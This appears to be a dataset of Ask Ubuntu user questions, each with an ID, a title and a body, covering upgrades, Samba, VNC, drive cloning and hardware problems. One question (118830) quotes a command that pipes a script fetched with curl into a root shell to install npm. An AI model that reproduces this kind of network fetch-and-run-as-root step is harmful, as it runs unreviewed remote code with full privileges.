that a vpn connection is broken , for instance ) . the network manager does not report any issues related to my wifi-connection though . help ?
118808	how to uninstall the youtube lens ?	original title : well , i installed a lens for youtube and cant figure out how to uninstall it . i do not exactly which site i used to install the script for the youtube lens , but i can not get it to play anything . the lens works as far as searching and finding what i want but aside from that , it wo n't do anything else . i do n't know if you can help out , but it would be awesome . thanks .
118810	unable to locate package blind9	when i try to install blind9 package in ubuntu server , i am getting error : unable to locate package blind9 how can resolve this problem ?
118811	email backup/archival program that saves emails as *.txt files	i 'm looking for a program that backs up all my emails from an online emailaccount that support pop or imap by saving them as plain text files ( an open document format or pdf file would also work ) . ideally in the following way : 1 ) every email should be in a folder whose name is the subject of that email . 2 ) the email inside that folder should be saved in text ( or at least in an different open document format or pdf file ) 3 ) as a plus , all attachements of an email should also be stored in the corresponding folder but it 's still ok if it is , for example , just one long text file . i 've tried evolution and thunderbird and could n't find such functionality ( please notice , that i 'm not a regular user of these programs since i manage my email online , so i barely know my way around them and only tried them out for the purpose of making this backup ) . this program does n't have to have email sending functionality and all the other stuff that evolution & thunderbird can do . i just need to archive my emails , so it only would have to download them and organize them in some way . saving my attachments would also be nice . the reason i 'm insisting on *.txt ( or open document format or pdf ) files is that i want to be able to read my emails in 10 years from now . if my emails are stored in some format of thunderbird for example and with some update of it support of that format gets dropped , i 'm lost . the *.txt probably will still be readable in 10 years time . and open document format files - while there may not be a program that supports them in 10 years - are still readable with a txt-editor , so i can use that to read them and extract the email from all the header data . for pdfs i assume there will still be a reader in 10 years .
118813	gnome-shell hide `` dock '' ?	i use docky in gnome-shell , hence i do n't need the gnome-shell dock . is there a way to disable ( or at least hide ) the gnome-shell dock ? i know i could set the width in whichever theme 's css file i use to 0px , but that requires me to edit every theme i use.. every time it is updated ( all my themes come from a ppa ) . perhaps there is an extension for this ?
118818	adobe flash plug-in crashed/needs permission in chromium	a couple of days ago i started to get these messages when trying to watch videos on youtube and a couple of other sites . ( using chromium browser ) normally starts by just seeing a black screen with missing plug-in faintly visible , but will also ask me to give permission to run both at top ( yellow bar ) , and if i tell it to 'allow ' it follows up with the white puzzle piece on black background requesting permission . occasionally i have seen the message telling me the flash-player has crashed , too . giving permission does not fix the problem . have also navigated to 'about : plugins ' and checked that adobe flash is enabled and permitted . i have just done a fresh installation of lubuntu 11.10 as a last resort but problem still not fixed .
118820	what will be the space requirements to upgrade to 12.04 ?	i am using ubuntu 11.10 and i want to update it via internet connection but i am not sure if my / partition has enough space.so what is the proper amount of free space required before upgrading to ubuntu 12.04 from ubuntu 11.10 ?
118822	how to launch application as root from unity launcher ?	mainly i am looking for a way to pin an application to the unity launch bar , and run it as root . currently , even if i start the application with sudo , and pin it after it starts , it will start as current user next time . sad , but there is no context menu option `` run as ... '' . update : i switched to gnome3 and now i 'm happy , i 'm missing only the search .
118824	corrupted ambiance theme	i have a corrupted ambiance theme ... the background of the top menus is grey : ( i must have done some fiddling ... if i choose another theme , it seems to work fine , but i want ambiance : d what do you think i could try ? i already tried downloading ambiance again , but same issue happens . i tried to download gnome color chooser , but it does n't do nothing , so i guess maybe i can change something else ... but where ? here 's a screenshot :
118827	upgrade 11.10 to 12.04	i have ubuntu 11.10 installed in my pc . is it possible to upgrade to 12.04 from 11.10 itself . without uninstalling 11.10 and then installing 12.04 , is it possible to upgrade directly from 11.10 ?
118830	what went wrong with my curl install ?	i 'm fresher than the prince to linux , i 've been following the instructions here : http : //chrisfulstow.com/running-node-js-on-windows-with-virtualbox-and-ubuntu ( the link tells what i am generally trying to do ) . i 'm all up and running in vbox , and am at the curl install part , i may have done the curl part a week ago i forget . so i ran this command anyway : danjah @ danjah-virtualbox : ~ $ sudo apt-get install curl result : [ sudo ] password for danjah : reading package lists ... done building dependency tree reading state information ... done curl is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . then : $ curl http : //npmjs.org/install.sh | sudo npm_install=rc sh result : fetching : { gzip : stdin : unexpected end of file /bin/tar : child returned status 1 /bin/tar : error is not recoverable : exiting now it failed should i be concerned ? how can i test curl ? how can i avoid these situations ? perhaps there 's a generic way of checking to see if i 've already installed packages/etc ? case specific answers and general advice most appreciated . cheers , d
118842	how can i upgrade to a newer version of btrfs-tools ?	the btrfs tools package in 12.04 appears outdated and does n't take advantage of the newer features such as scrub introduced in kernel v 3.0 . how can i upgrade to a newer version ? do i need to compile from source ? i 've installed the debian package from wheezy , same version is in sid . the package has the most up to date features , which i need . no system instability so far . hope ubuntu gets it in the repository soon . thanks for the advice .
118846	edit user real name and change avatar	i reinstalled ubuntu and i am now unable to change/input my real name . memenu does not display usernam either . is there a way to input this data manually by changing some hidden file or smth ? ! btw , user-manager window brakes when trying to change avatar ...
118850	ca n't boot from cd	i have an i7 pc with 16gb ram running window 7 . i want to learn to use linux booting from the cd before i install it on a hd . i downloaded the 10.04 lts ( 64-bit ) iso file and ran the md5sum check . ok so far . i burned it to cds twice , once with windows , once with nero . in both cases , the individual files and folders are visible in the directory . does this verify it was burned correctly ? the following is the same for both cd copies ... if/when i install linux , i 'll change the bios , but for now i 'm using f12 at start-up . at first , i get a purple screen with a couple of symbols . no text . then i get a black screen with a flashing cursor . then i get a second purple screen with the name ubuntu and 5 dots changing between white and red . this lasts for about 45 seconds . then it goes black and i have to cut power to the tower to recover . what am i doing wrong ?
118852	what is the status of locally integrated menus for 12.04 ?	how can i know the current development status of lim ( locally integrated menus ) . can i install lim in precise beta 2 ? . thanks .
118853	play video in virtualbox guest	i am installing windows 7 today with ubuntu 12.04 beta 2 as a virtualbox guest . can ubuntu ( as a guest ) play 2d videos within virtualbox ? is there anything i need to install or enable ? i remember windows 7 as a virtualbox guest can play videos , but i do n't remember how good a quality they were . hopefully someone out there knows what todo .
118858	ubuntu as multi port router	if i have an 4 ( or more ) ethernet port linux box , how to setup it as router to handle 4 class c subnet ? for example , eth0 = > 192.168.1.0/24 , eth1 = > 192.168.2.0/24 , eth2 = > 192.168.3.0/24 , eth3 = > 192.168.4.0/24 , each client machine with in those 4 subnets can talk to each other . any suggest script ?
118860	change default 'print to file ' settings	how can i change the default settings for 'print to file ' in the print dialogue ? i would like to change the default save location from ~/ to ~/desktop . p.s . i do not want to have to use cups-pdf
118861	can i run a login script irrespective of the shell ?	is there a way to run a script on login irrespective of the shell ? i would like to have something on the lines of the ssh login to an ubuntu server - which displays the free ram etc . i understand that the welcome message itself is in /etc/motd , but the file seems to update on each login . how is this done ? i do not want to use ~/.bashrc or ~/.profile and would like to have one for all users in the system by default .
118862	how can i set 'print to file ' as my default printing option ?	at the moment when i print , my deskjet-3050 is selected as the default printer . i would like 'print to file ' to be the default 'printer ' without using cups-pdf i specifically do not want to use cups-pdf because of the way it renders text ( see below ) . i am not entirely sure what it is doing but it seems as though it renders the text as bitmaps and embeds them in pdf ( as i am not able to highlight/copy/search embedded text as i am using a standard print to file pdf ) . n.b . this is not a dupe of : can i make pdf the default for 'print to file'
118873	how to add timestamp to bash after completed command	i would like to add the current time upon execution of a bash command . i would like it to be in the right hand site so not to be intrusive . the output i am looking for is : batman @ batcave : ~/grails $ ls -l total 84 drwxr-xr-x 2 batman batman 4096 2011-02-16 09:54 bin drwxr-xr-x 2 batman batman 4096 2011-02-16 08:24 scripts drwxr-xr-x 9 batman batman 4096 2011-02-16 08:24 src batman @ batcave : ~/grails $ **10:46:06** ideas on how to accomplish this ? ?
118875	distribution upgrade error	when i go to system settings and click on software sources nothing happens . when i try sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... failed the following packages have unmet dependencies : gnome-shell : depends : libcogl5 ( > = 1.7.4 ) but it is not going to be installed depends : gnome-shell-common ( = 3.2.2.1-0ubuntu0.1 ) but 3.4.0+git20120401.c16dbd76-0ubuntu1~11.10~ricotz0 is to be installed gnome-shell-common : breaks : gnome-tweak-tool ( < 3.3 ) but 3.2.0-2ubuntu1~oneiric is to be installed libmutter0 : breaks : gnome-shell ( < 3.3.92~ ) but 3.2.2.1-0ubuntu0.1 is to be installed mutter-common : breaks : gnome-shell ( < 3.3.92~ ) but 3.2.2.1-0ubuntu0.1 is to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages .
118878	how to install qt 4.8 from repository ?	how to install qt 4.8 and qtcreator from repository ?
118879	i 'm using ~/bin in my $ path variable , how can i make unity also display my scripts in there ?	i have some scripts and some starters for programs i did n't install via the software center in my ~/bin folder . it is in my $ path variable and i can use my scripts by pressing alt+f2 and also directly in a terminal . how can i achieve that i can call them also with unity ( pressing super ) ? thanks
118880	pdf reader that supports bookmarks ?	is there a pdf reader that supports bookmarks ? i 'm reading a book and it would be great to bookmark where i left off . i ca n't seem to find a pdf reader that does this very simple thing .
118884	how can i get the command log of a particular user on ubuntu server ?	is there a way to find a log of all the commands that have been run by a user on ubuntu 11.10 server ? i need to find out what my friend ran to install a program .
118886	is there a usage count for packages or programs ?	motivation : i want to remove applications i do not use to speed up my package processing tasks like dist upgrades , regular updates , but also for saving disk space and other reasons . i know this is a complex topic so first i will ask my question and second i will give some answers i already found out . question : how do i find out which package i did not used at all or for a long time ? for example i always use the vlc so i could remove other players like totem . of course package dependencies could force me to have programs installed which i will never use . notes : find the packages which consume much space via synaptic : select `` status '' in lower left , select `` installed '' in upper left , sort column on `` size '' in upper right . then you can decide which big packages you really need . use aptitude autoremove use ubuntu-tweak 's janitor for removing old kernel packages , old configs , apt-cache entries , etc . manually search for applications for a given task that you usually solve with your standard app . e.g . movie player , music player , office program , browser etc . ( btw : this is what i want to be helped with my question ) when removing packages i always favour `` apt-get purge '' over `` aptitude remove -- purge '' as aptitude often will also remove essential packages due to package dependencies . e.g . when removing `` evolution '' ( as i use thunderbird ) aptitude wants to remove also `` ubuntu-desktop '' and 756 other packages as well , while apt-get just removes evolution and its helping pacakges like evolution-common . ubuntu lense gives me most recent used applications which are candidates for keeping : ) employ deborphan as i read in this related answer : how do i clean up my harddrive ? i should certainly keep essential packages : keep only essential packages this question is pretty much a duplicate of how to see what installed packages i have never used for cleaning purposes but covering only few aspects . however one answer suggests to use a program called unusedpkg but the link seems down . there is also a program called kleen http : //code.google.com/p/kleen/ but it wo n't compile in 11.10 . however i hacked it to compile but the results are unusable , as for example the g++ package was marked as not used for 203 days , but actually i used it seconds ago for compiling kleen itself ; ) so do n't use this tool . on http : //wiki.debian.org/debianpackageinformation i read the the package popularity-contest will produce log files with usage statistics . unfortunately i did n't enabled the popularity contest so i ca n't find this log file .
118889	searching for ubuntu video i saw that covered ubuntu one	i have been searching for an ubuntu video i saw 1-2 months ago where they guy was demonstrating ubuntu one and how he used it to sync local profile stuff across different machines . has anyone seen this ? i forgot exactly what it was about but i know he spent a minute or two on the video if not the whole video . i searched all my web history as well as youtube history but no go . not sure if we are allowed to ask these questions but here goes .
118892	how do i disable touchpad tap to click ?	you 've heard this a million times but the `` tap to click '' is a pain in the behind and i want to disable it . there is no touchpad in gpointing-device-settings and neither in mouse and touchpad in system settings . i 've tried some commands in terminal but it 's all crap . dconf-editor does n't react . how about solving this once and for all ? comp : dell inspiron n5110 xinput list : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ power button id=9 [ slave keyboard ( 3 ) ] ↳ sleep button id=10 [ slave keyboard ( 3 ) ] ↳ laptop_integrated_webcam_hd id=11 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] ↳ dell wmi hotkeys id=14 [ slave keyboard ( 3 ) ] edit : i think someone fixed it here on launchpad can someone explain the fix like i was a four year old idiot ? ( using precise pangolin )
118898	after open google chrome ubuntu 11.10 crashes all browsers	i have been using ubuntu 11.10 for 1 year , today it made me surprised . when i open google chrome it just closes itself . firstly i thought that it is just for chrome and tried firefox : it also closes itself and one thing more : i tried desktop programs such as image viewer it also closes itself.i restarted it but there is no changing.what can do this ? is it virus or another system problem ? i did not have any problem like this until today.. $ google-chrome ( exe:7166 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( exe:7201 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , failed to open vdpau backend libvdpau_nvidia.so : can not open shared object file : no such file or directory segmentation fault libvdpau_nvidia.so : can not open shared object file : no such file or directory solved by nvidia-current packet reinstallation . segfault still there .
118903	what android emulators are available ?	i will like to know some of the android emulators that work really well with ubuntu 11.10 and above . i want to try 'whatsapp ' on ubuntu through an android emulator . thanks in advance
118909	how do i modify existing themes in 12.04 ?	is there any way to modify the theme that comes with ubuntu 12.04 ? it was possible with ubuntu 10.x . i wonder why they removed the basic customization . are there any improvements in this area for 12.04 ?
118916	black screen after installing ubuntu 11.10 on new pc	after installing ubuntu on my fresh desktop , the ubuntu loading screen shortly appears and then i get a black screen . after that the screen is split into two . the image begins at the middle and then continues over the left half of the screen . i have a radeon 6850hd with dual monitors connection , has it something to do with this ? when booting in failsafe mode , i get a message that ubuntu failed to load failsafe video drivers . i am able to start a live session though . so i guess it loads the wrong drivers upon booting from hd . i think maybe editing the xorg.conf file could help , but until now i did not succeed .
118918	how to boot to ubuntu desktop not tty1-6	i ca n't get into ubuntu desktop , only tty1-6 . how do i make it boot to ubuntu desktop ? i did try ctrl-alt-f7 version : ubuntu 11.10 ( the only os installed ) very old pc : dell intel inside pentium 4 20gb hard drive no internet please explain step by step , thanks !
118920	creating a mixed network . for windows and ubuntu	as a ubuntu newbie ( 11.10 ) i have a wired desktop , and a laptop on ubuntu , and another windows 7 laptop i use for college ... how do i get them to `` talk '' to one another , for sharing files ... sharing printing ... and the like ... my win laptop does not see the ubuntu machines , even though they connect to the same fios gateway ... help ? ? ?
118927	clone internal hdd to new ssd	i recently installed an ssd into my machine . the machine itself is a lenovo thinkpad w520 , and it previously had an internal hdd . i moved the internal hdd into an expansion bay ( replacing the cd-rom ) , and put the new ssd into the internal bay . the problem i 'm having is that i have my ubuntu configuration exactly the way i want it - i originally spent many hours configuring it to get it to the way it is now . i 'd rather not do this again . but , i 'd also like the boot-up gains i would get from the os being on the ssd . so , what i 'd like to do is clone my ubuntu partition onto the ssd . the catch is that the standard hdd is significantly bigger than the ssd . and it has a windows partition that i do n't need on the ssd ( i never use windows , so if it boots off of the other hard drive , that 's fine ) . the layout of my hard drives are as follows : /dev/sda ( ssd ) : model : ata m4-ct256m4ssd2 ( scsi ) disk /dev/sda : 256gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 147gb 147gb primary ext4 boot /dev/sdb ( hdd ) : model : ata st9500420as ( scsi ) disk /dev/sdb : 500gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 1259mb 1258mb primary ntfs boot 2 1259mb 269gb 268gb primary ntfs 4 269gb 483gb 214gb extended 5 269gb 416gb 147gb logical ext4 7 416gb 475gb 58.9gb logical linux-swap ( v1 ) 6 475gb 483gb 8470mb logical 3 483gb 500gb 16.8gb primary ntfs what i 've tried so far : 1 ) resizing the partitions /dev/sdb5 and /dev/sda1 to be the same size . 2 ) booting into ubuntu 11.04 ( from /dev/sdb5 ) and running dd if=/dev/sdb5 of=/dev/sda1 ( of course this causes problems with booting , so i had to reinstall grub.. i can get it to boot , but then i have problems with initrd not finding some files ... presumably it ca n't load some partitions i think ) . now , i think those two steps are the wrong approach , because it will clone /dev/sdb5 exactly - including references in fstab which point to the wrong hard drive . i 'm not sure exactly how to rectify this . i could install ubuntu 11.04 onto the ssd , then try and copy over all of my configurations , but i 'm concerned that i 'm going to lose something , or that i 'm going to overwrite something like fstab that points back to the original hard drive . note that currently , i can still boot from the hdd , so it 's not imperative that i get this figured out right away , but i do want it to be exactly how it is right now , so that i can maintain my current level of productivity ( it 's a work laptop ) . suggestions on how i might be able to overcome this difficulty ? thanks in advance !
118942	can i set up samba so it automatically allows all the local usernames and passwords ?	i have set up samba like this ( this is the complete smb.conf ) : [ global ] log file = /var/log/samba/log log level = 2 security = user [ homes ] browsable = false read only = no valid users = % s i 'd like to enable every user on server to access their home directories , but for some unknown reason only my 'administrator ' account can do so . ( i have done that with ftp before , but now smb is also needed ) . when i try to smbclient -l localhost -u [ user ] , i get nt_status_logon_failure , except with the administrator ( which is the user created during the ubuntu installation , not root ) . the samba log file says nt_status_no_such_user : [ 2012/04/04 20:26:02.081454 , 2 ] smbd/reply.c:554 ( reply_special ) netbios connect : name1=localhost 0x20 name2=dialer-x 0x0 [ 2012/04/04 20:26:02.081733 , 2 ] smbd/reply.c:565 ( reply_special ) netbios connect : local=localhost remote=dialer-x , name type = 0 [ 2012/04/04 20:26:02.087200 , 2 ] auth/auth.c:314 ( check_ntlm_password ) check_ntlm_password : authentication for user [ public ] - > [ public ] failed with error nt_status_no_such_user i suspect that i have to manually create samba users , but the man pages state that if the client has passed a username/password pair and that username/password pair is validated by the unix system 's password programs , the connection is made as that username . to me that sounds like as long as the provided username/password is a valid login on the server , it should work . am i missing something totally obvious ? i do n't want / ca n't afford to manually update the samba users and passwords to match the server 's . 11.10
118943	how can i enable the nautilus feature that on shift+right-click i get an extra menu entry that says “open with“ ?	i know it was there in previous versions . i often want to open things with gedit . maybe there 's a workaround .
118948	dual boot linux/windows grub	i have a asus computer and i 'm trying to install ubuntu . i have 2 hard disk , so i installed ubuntu on the second one ( where there is no windows 7.. ) , format the partition of 100go in ext4 , and choose at boot sector the partition of the 1st hdd where it was written `` windows loader '' but had an error so i choose the root of the 1sthdd but still no choice at the boot of the computer , windows boot and no grub ... how can i fix it ?
118953	how to delete a panel in the classic desktop ?	i 'm using 12.04 beta 2 . i installed the classic desktop and i 'm using the awn dock . i tried right clicking on the bottom panel to delete it like you used to do in earlier versions , but nothing happens .
118961	how can a usb be detected but not show up anywhere ?	i started the morning by trying to create a bootable usb using a 2gb stick and the startup disk creator . it seemed to run through the whole process just fine until it got to a screen that read something like `` creating memory partion '' and which sat on 100 % for about 45 minutes before i hit cancel and removed the usb stick . now the usb stick is not being detected as storage or ... anything ( even on my windows pc ) though it does show up in the syslog . allow me to demonstrate . we start with the usb not plugged in : [ georgemauer @ ubuntu : ~ ] $ sudo fdisk -l ( 04-04 16:01 ) disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x994bdc0f device boot start end blocks id system /dev/sda1 2048 27650047 13824000 27 hidden ntfs winre /dev/sda2 * 27650048 27854847 102400 7 hpfs/ntfs/exfat /dev/sda3 27854848 976771119 474458136 7 hpfs/ntfs/exfat i plug in the usb : [ georgemauer @ ubuntu : ~ ] $ tail -f /var/log/syslog ***snip*** apr 4 15:01:18 ubuntu wpa_supplicant [ 1136 ] : wpa : group rekeying completed with 00:24:36 : ad : e7:3f [ gtk=tkip ] apr 4 15:02:29 wpa_supplicant [ 1136 ] : last message repeated 3 times apr 4 15:02:29 ubuntu kernel : [ 22122.788133 ] usb 2-1 : new high speed usb device number 13 using ehci_hcd apr 4 15:02:29 ubuntu kernel : [ 22122.923873 ] scsi10 : usb-storage 2-1:1.0 apr 4 15:02:29 ubuntu mtp-probe : checking bus 2 , device 13 : `` /sys/devices/pci0000:00/0000:00:13.2/usb2/2-1 '' apr 4 15:02:30 ubuntu mtp-probe : bus : 2 , device : 13 was not an mtp device apr 4 15:02:30 ubuntu kernel : [ 22123.926154 ] scsi 10:0:0:0 : direct-access generic usb mass storage 1.00 pq : 0 ansi : 2 apr 4 15:02:30 ubuntu kernel : [ 22124.105118 ] sd 10:0:0:0 : attached scsi generic sg1 type 0 apr 4 15:02:30 ubuntu kernel : [ 22124.108212 ] sd 10:0:0:0 : [ sdb ] attached scsi removable disk but then : [ georgemauer @ ubuntu : ~ ] $ ls /mnt -alf ( 04-04 16:02 ) total 8 drwxr-xr-x 2 root root 4096 2011-04-21 12:51 ./ drwxr-xr-x 26 root root 4096 2012-03-31 13:16 ../ [ georgemauer @ ubuntu : ~ ] $ ls /media -alf ( 04-04 16:03 ) total 8 drwxr-xr-x 2 root root 4096 2012-04-04 12:18 ./ drwxr-xr-x 26 root root 4096 2012-03-31 13:16 ../ what could be going on and how do i recover my usb key ?
118963	ca n't adjust screen resolution in virtualbox guest	i installed windows7 on virtualbox but the even in fullscreen the screen of the virtual machine remains small . i ca n't seem to be able to adjust it . is there any way in the settings to make it 1280x800 resolution ?
118965	openjdk-7-jre on ubuntu 10.10	as mentioned here , by running this commande you shoud have the jre of j7 . $ sudo apt-get install openjdk-7-jre but i cant always find the package in the officiel reposory of ubuntu even after updating my /etc/apt/sources.list . am i the only one how have this problem or its a question of my ubuntu version .
118970	bootmgr image is corrupt fault while dual booting ubuntu and windows7	i have ubuntu precise beta 2 and windows7 set up to dual boot . the set up had been perfect , until today , with a black screen presented when trying to boot windows with a bootmgr image is corrupt , can not boot fault . is there any way to fix this from ubuntu , or is a reinstall my only option ?
118971	mysql prevents server from booting unless password is entered	i am kind of new with ubuntu but i have been working on setting up a lamp server with hamachi as a vpn client for management . the issue is that when we turn the server on or restart it we are required to enter the mysql password before it will continue . where can we script a password or disable this ? i have attached a partial of less /var/log/boot.log * starting mysql serveresc [ 204g [ ok ] ... ... . ok password : if i have n't provided enough information please just comment and ill try my best .
118977	how do i remove the skype icon from the system panel ?	i have been trying for some time to remove the skype icon in the upper panel in ubuntu 11.10 , but to no avail . i have went into dconf , went to desktop - > unity - > panel , and i looked to delete 'skype ' from the whitelist . but skype is n't in the whitelist ! and it 's showing up on the panel ! something smells fishy here , and i was wondering if anyone had an answer as to a ) how i can actually remove the skype icon from the gnome panel and b ) why an icon still show up there if it is n't in the whitelist ? also , if it 's relevant , i use unity . edit : so , the only solution for this issue is the scorched earth strategy of removing sni-qt ?
118982	how to change battery mode on my laptop ?	i installed ubuntu 11.10 last day and tried to change battery mode ( change balanced mode to power save mode like on windows ) on my laptop , but i do n't know how to do it . is there anyway to do that ? is there any program to do that ?
118983	disable click-drag scrolling in ubuntu 12.04 ?	the smooth scrolling and android-style scrolling is great , but how do i keep ubuntu from scrolling when i try to click and drag to select text ?
118989	disable plugin in firefox ( acroread )	i installed acroread from the repositories , and it has decided it should be the default plugin in firefox , such that when i click on a pdf , it opens in a firefox window . unfortunately , it does not display ( at least when in dual head mode ) . this should be simple , but i can not disable the plugin . under firefox edit - > preferences- > applications - > pdf is set to `` always ask '' so i do n't know why it uses acroread in the first place . under tools - > manage content plugins i see acroread is selected for pdf content . i have the option in the dropdown to search for a new plugin , but not to simply download the file . typing about : config into the firefox toolbar gives me a list of configuration options , but does not mention plugin.disable or acroread anywhere . how do i disable the plugin ? i have firefox 11.0 on ubuntu 11.10
118991	which ubuntu version to use on a maxdata laptop eco 3100x ? with this system info	i am speaking as new ubuntu user , i just have installed ubuntu 10.04 on my laptop , but is running very slow ... so i am here to ask you a question : which ubuntu version can fit for my laptop maxdata eco 3100x , . and the screen freezes sometimes , i did install the lubuntu and xubuntu extention , still problem.. maybe is a the video driver not configured as it should , i had the same issue with windows xp , but i installed the vga video drivers of it then it was ok . but on ubuntu this driver i could not installed , what to do ? my laptop system information are : system information running ubuntu linux , the ubuntu 10.04 ( lucid ) release . gnome : 2.30.2 ( ubuntu 2010-06-25 ) kernel version : 2.6.32-40-generic ( # 87-ubuntu smp mon mar 5 20:26:31 utc 2012 ) gcc : 4.4.3 ( i486-linux-gnu ) xorg : unknown ( 25 february 2012 06:59:39am ) ( 25 february 2012 06:59:39am ) hostname : lotus-laptop uptime : 0 days 1 h 6 min cpu information genuineintel , intel ( r ) pentium ( r ) 4 cpu 2.40ghz number of cpus : 1 cpu clock currently at 2390.561 mhz with 512 kb cache numbering : family ( 15 ) model ( 2 ) stepping ( 7 ) bogomips : 4781.12 flags : fpu vme de pse tsc msr pae mce cx8 mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe up pebs bts cid memory information total memory : 228 mb total swap : 455 mb storage information scsi device - scsi0 vendor : ata model : ibm-djsa-210 scsi device - scsi1 vendor : toshiba model : dvd-rom sd-c2502 hardware information motherboard host bridge silicon integrated systems [ sis ] 650/m650 host ( rev 11 ) pci bridge ( s ) silicon integrated systems [ sis ] virtual pci-to-pci bridge ( agp ) silicon integrated systems [ sis ] virtual pci-to-pci bridge ( agp ) usb controller ( s ) silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) ( prog-if 10 ) silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) ( prog-if 10 ) silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) ( prog-if 10 ) silicon integrated systems [ sis ] usb 2.0 controller ( prog-if 20 ) silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) ( prog-if 10 ) silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) ( prog-if 10 ) silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) ( prog-if 10 ) silicon integrated systems [ sis ] usb 2.0 controller ( prog-if 20 ) isa bridge silicon integrated systems [ sis ] sis962 [ mutiol media io ] ( rev 04 ) ide interface silicon integrated systems [ sis ] 5513 [ ide ] ( prog-if 80 [ master ] ) subsystem : silicon integrated systems [ sis ] 5513 [ ide ] graphic card vga controller silicon integrated systems [ sis ] 65x/m650/740 pci/agp vga display adapter subsystem : uniwill computer corp device 5103 sound card multimedia controller silicon integrated systems [ sis ] ac'97 sound controller ( rev a0 ) subsystem : uniwill computer corp device 5203 network ethernet controller silicon integrated systems [ sis ] sis900 pci fast ethernet ( rev 91 ) subsystem : uniwill computer corp device 5002 modem silicon integrated systems [ sis ] ac'97 modem controller ( rev a0 ) subsystem : uniwill computer corp device 4003 thanks you asap . : - ) e
118995	grub background resolution and text ?	i want to know my grub resolution ? and what if i set the grub background image that is higher or lower resolution than current grub resolution , do i have to resize it ?
119004	how do i manually set the resolution of an external monitor on my laptop ?	i have a second monitor that i 'd like to use with my laptop but it does n't report its full resolution to ubuntu and i 'm stuck using it in 1024x800 mode . yuck . i 'd like to manually set the resolution somehow but i 'm worried about messing with xorg.conf since that monitor is n't always plugged in . edit : i can use the screen , just at the wrong resolution
119005	vnc server not responsive after a few days	i am new to ubuntu ( 11.10 ) - i installed ubuntu on a box which has no screen and no keyboard . it is mostly used as a file and media server ( i.e . samba + xbmc ) and i control it via tightvncserver . so far so good : i can connect via vnc and view / control the screen remotely . but after a few days , when trying to connect via vnc , i do n't get a response . the media server is still on , ping is fine , but vnc is down . the only solution i have found is to plug a screen and keyboard and reboot . all is then fine but the problem arises again after a few days ... i am not sure how to diagnose the problem ( maybe some log files ? ) or if this is just a configuration issue . any help appreciated .
119007	compiz error after emerald install	salutations ! so , once again , i fell to the allure of the window decorator emerald . where , just like the first time around , ( i know i know ) upon attempting to back out of emerald to the safety of compiz i 'm faced with a problem . seemingly after several minutes or after opening chrome any window that is n't maximised has it 's borders removed ( so there 's no close , minimise and maximise etc buttons ) . i can get them breifly back if i reload compiz via fusion-icon . after a brief chat on irc it appears compiz is crashing . here 's a pastebin log of me running compiz via terminal . http : //pastebin.com/sk65v4fi i forgot my two vows of 'never bother using windows applications via wine or a vm ' and 'thou shalt never not use compiz ' . ***gtk-window-decorator log gtk-window-decorator ( gtk-window-decorator:11027 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , segmentation fault ** also posted on ubuntuforums to widen my scope of help .
119013	make a custom live iso that have dropbox installed in it	how i can make a custom ubuntu live cd iso that have dropbox app installed in it ? if somebody can make this iso and put it somewhere for downloading , it would be great !
119014	btrfs subvolumes vs folders ?	i 've read a fair bit about btrfs 's subvolumes feature . while it would seem interesting to have subvolumes for the main categories in a data filesystem , such as @ films , @ pictures , @ music ... what advantage does this provide over just having folders ? will i need to mount each subvolume ? or will the subvolumes appear like folders under the root mount point ? i.e for a /data mount point will i have : /data/pictures , /data/music , etc
119015	i can not connect to the internet with cable	tengo un computador de escritorio ( board : gigabyte h61m , procesador : intel core i3 de 64 bits , ram : ddr3 4 gb ) y puedo acceder a internet normalmente desde windows 7 ( mi conexión es por cable directamente al modem ( referencias del modem : d-link dsl-2640t ) ) e instale ubuntu 11.04 y no puedo acceder a internet , probé con ubuntu 10.04 ( que es el que tengo actualmente instalado ) y tampoco funciono no se que debo configurar ni que hacer , simplemente no se conecta , he intentado cambiando de modo automatico a modo manual en ipv4 y colocando los datos correspondientes ( dirección ip , máscara de red y servidores de dns ) y no logro conectarme aún , agradezco la ayuda machine traslator hi , i have a desktop ( board : gigabyte h61m , processor : intel core i3 64-bit ram : 4 gb ddr3 ) and i can access the internet normally from windows 7 ( my connection is wired directly to the modem ( modem references : d-link dsl-2640t ) ) and install ubuntu 11.04 and i can not access the internet , i tried ubuntu 10.04 ( which is what i have currently installed ) and worked either not set or that i should do , just does not connect , i tried switching from automatic mode to manual mode ipv4 and placing the data ( ip address , subnet mask and dns servers ) and i can not even connect , appreciate the help
